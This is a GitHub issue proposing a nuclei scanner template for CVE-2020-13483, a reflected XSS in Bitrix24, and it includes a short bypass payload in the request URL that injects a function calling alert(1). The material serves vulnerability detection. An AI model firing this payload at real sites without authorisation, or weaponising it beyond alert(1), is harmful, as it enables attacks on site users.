### ISSUE TITLE
Bitrix24 CMS bypass CVE-2020-13483

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#3558]
### Template Information:

I know there is an existing template for this but this is a bypass with a shorter payload and it's the first time I am contributing to the nuclei template.

### Nuclei Template:

```yaml
id: CVE-2020-13483

info:
  name: Bitrix24 CMS BYPASS XSS
  author: 3th1c_yuk1
  severity: medium
  reference: https://twitter.com/brutelogic/status/1483073170827628547
  tags: cve,cve2020,xss,bitrix

requests:
  - method: GET
    path:
      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
        part: body

      - type: word
        words:
          - text/html
        part: header

      - type: status
        status:
          - 200
```
